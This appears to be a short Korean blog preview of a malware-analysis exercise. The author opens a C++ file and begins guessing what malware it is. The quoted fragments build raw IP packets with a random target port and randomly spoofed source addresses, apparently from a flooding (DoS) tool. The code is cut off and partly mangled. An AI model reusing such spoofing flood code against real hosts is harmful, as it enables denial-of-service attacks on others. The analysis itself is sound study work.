해킹&보안/악성코드 및 치트
2024. 5. 12.
악성코드 분석 1
▶ 문제 ▶ 분석 시작CPP파일을 열어보니 아래와 같은 C++코드가 나왔습니다.이 코드들을 보고 어떤 악성코드인지 유추해보면 될 것 같습니다.addr_in.sin_family=AF_INET; addr_in.sin_port=htons(TargetPort); addr_in.sin_addr.s_addr=TargetIP;ipHeader.h_verlen=(4len) break;if(bRandPort) { TargetPort=brandom(1000, 10000); }szSpoofIP[0]=(char)brandom(0, 255); szSpoofIP[1]=(char)brandom(0, 255);szSpoofIP[2]=(char)brandom(0, 255); szSpoofIP[3]=(char)brandom(0, 255)..